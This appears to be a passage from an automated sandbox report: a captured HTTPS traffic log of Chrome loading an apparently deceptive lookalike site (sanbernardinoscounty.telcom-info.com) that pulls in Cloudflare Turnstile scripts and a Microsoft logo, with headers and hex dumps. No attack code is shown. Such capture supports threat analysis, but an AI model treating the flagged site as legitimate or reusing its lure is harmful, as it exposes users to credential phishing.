                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649723104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:46 UTC580OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:47 UTC356INHTTP/1.1 302 Found
                                                                          Date: Tue, 01 Oct 2024 22:42:47 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                          cross-origin-resource-policy: cross-origin
                                                                          location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7c3f9398c96-EWR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649725104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:47 UTC685OUTGET /captcha/logo.svg HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:42:47 UTC662INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:47 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Content-Length: 3202
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Cache-Control: max-age=14400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 3328
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymY4dC9oUb43DfQ7%2BgZjLpfBL680S6RFoz556YROiErMvqmB5fIiMTlC%2B707AGE%2BiJCPyT6G9uD%2FWc2jms41XcEcVb1Fn7XJvmnuoX6hTJCrMkpo5cy5iRaDJPIu2bKaQQBhsEl6tNpd0Prq0RYyER07thSzrqk%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7c6ea9772c2-EWR
                                                                          2024-10-01 22:42:47 UTC707INData Raw: 3c 73 76 67 20 69 64 3d 22 4d 53 4c 6f 67 6f 22 20 77 69 64 74 68 3d 22 39 39 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 33 37 34 37 34 22 0d 0a 64 3d 22 6d 33 34 2e 36 34 20 31 32 2e 30 37 2d 2e 35 38 20 31 2e 36 35 68 2d 2e 30 34 63 2d 2e 31 2d 2e 33 39 2d 2e 32 38 2d 2e 39 33 2d 2e 35 36 2d 31 2e 36 33 6c 2d 33 2e 31 34 2d 37 2e 39 68 2d 33 2e 30 38 76 31 32 2e 35 36 68 32 2e 30 33 56 39 2e 30 33 6c 2d 2e 30 33 2d 31 2e 37 63 2d 2e 30 31 2d 2e 33 34 2d 2e 30 35 2d 2e 36 2d 2e 30 36 2d 2e 38 31
                                                                          Data Ascii: <svg id="MSLogo" width="99" height="22" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path fill="#737474"d="m34.64 12.07-.58 1.65h-.04c-.1-.39-.28-.93-.56-1.63l-3.14-7.9h-3.08v12.56h2.03V9.03l-.03-1.7c-.01-.34-.05-.6-.06-.81
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 2e 34 2d 31 2e 33 20 31 2d 31 2e 37 20 31 2e 37 34 61 35 2e 35 37 20 35 2e 35 37 20 30 20 30 20 30 2d 2e 30 31 20 34 2e 39 63 2e 33 37 2e 37 2e 39 20 31 2e 32 33 20 31 2e 35 38 20 31 2e 36 2e 36 37 2e 33 38 20 31 2e 34 35 2e 35 37 20 32 2e 33 31 2e 35 37 20 31 2e 30 31 20 30 20 31 2e 38 37 2d 2e 32 20 32 2e 35 36 2d 2e 36 6c 2e 30 33 2d 2e 30 32 76 2d 31 2e 39 34 6c 2d 2e 31 2e 30 37 63 2d 2e 33 2e 32 33 2d 2e 36 35 2e 34 2d 31 2e 30 33 2e 35 34 61 33 2e 31 32 20 33 2e 31 32 20 30 20 30 20 31 2d 31 2e 30 31 2e 32 63 2d 2e 38 33 20 30 2d 31 2e 35 2d 2e 32 36 2d 31 2e 39 38 2d 2e 37 38 61 33 20 33 20 30 20 30 20 31 2d 2e 37 33 2d 32 2e 31 34 63 30 2d 2e 39 2e 32 35 2d 31 2e 36 35 2e 37 36 2d 32 2e 32 61 32 2e 36 20 32 2e 36 20 30 20 30 20 31 20 31 2e 39 38
                                                                          Data Ascii: .4-1.3 1-1.7 1.74a5.57 5.57 0 0 0-.01 4.9c.37.7.9 1.23 1.58 1.6.67.38 1.45.57 2.31.57 1.01 0 1.87-.2 2.56-.6l.03-.02v-1.94l-.1.07c-.3.23-.65.4-1.03.54a3.12 3.12 0 0 1-1.01.2c-.83 0-1.5-.26-1.98-.78a3 3 0 0 1-.73-2.14c0-.9.25-1.65.76-2.2a2.6 2.6 0 0 1 1.98
                                                                          2024-10-01 22:42:47 UTC1126INData Raw: 2e 37 38 2e 36 35 2d 2e 35 32 2e 39 38 2d 31 2e 32 2e 39 38 2d 32 2e 30 35 20 30 2d 2e 36 2d 2e 31 38 2d 31 2e 31 32 2d 2e 35 33 2d 31 2e 35 34 2d 2e 33 34 2d 2e 34 32 2d 2e 39 34 2d 2e 38 2d 31 2e 37 38 2d 31 2e 31 34 6d 39 2e 36 38 20 33 63 2d 2e 34 2e 35 2d 31 20 2e 37 35 2d 31 2e 37 38 2e 37 35 2d 2e 37 37 20 30 2d 31 2e 33 39 2d 2e 32 36 2d 31 2e 38 32 2d 2e 37 37 61 33 2e 32 35 20 33 2e 32 35 20 30 20 30 20 31 2d 2e 36 35 2d 32 2e 31 36 63 30 2d 2e 39 36 2e 32 32 2d 31 2e 37 2e 36 35 2d 32 2e 32 32 61 32 2e 32 34 20 32 2e 32 34 20 30 20 30 20 31 20 31 2e 38 2d 2e 37 38 63 2e 37 35 20 30 20 31 2e 33 34 2e 32 35 20 31 2e 37 36 2e 37 34 2e 34 33 2e 35 2e 36 35 20 31 2e 32 34 2e 36 35 20 32 2e 32 20 30 20 2e 39 38 2d 2e 32 20 31 2e 37 33 2d 2e 36 20 32
                                                                          Data Ascii: .78.65-.52.98-1.2.98-2.05 0-.6-.18-1.12-.53-1.54-.34-.42-.94-.8-1.78-1.14m9.68 3c-.4.5-1 .75-1.78.75-.77 0-1.39-.26-1.82-.77a3.25 3.25 0 0 1-.65-2.16c0-.96.22-1.7.65-2.22a2.24 2.24 0 0 1 1.8-.78c.75 0 1.34.25 1.76.74.43.5.65 1.24.65 2.2 0 .98-.2 1.73-.6 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.649727104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:47 UTC579OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:47 UTC441INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:47 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47262
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7c8bd12197c-EWR
                                                                          2024-10-01 22:42:47 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                          Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                          Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                          Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                          Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                          Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                          Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                          Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                          Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                          2024-10-01 22:42:47 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                          Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.649728184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:48 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-10-01 22:42:48 UTC467INHTTP/1.1 200 OK
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-neu-z1
                                                                          Cache-Control: public, max-age=151382
                                                                          Date: Tue, 01 Oct 2024 22:42:48 GMT
                                                                          Connection: close
                                                                          X-CID: 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.649729104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:48 UTC819OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/ HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:49 UTC1369INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:48 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 164872
                                                                          Connection: close
                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          cross-origin-embedder-policy: require-corp
                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                          cross-origin-opener-policy: same-origin
                                                                          document-policy: js-profiling
                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          referrer-policy: same-origin
                                                                          cross-origin-resource-policy: cross-origin
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
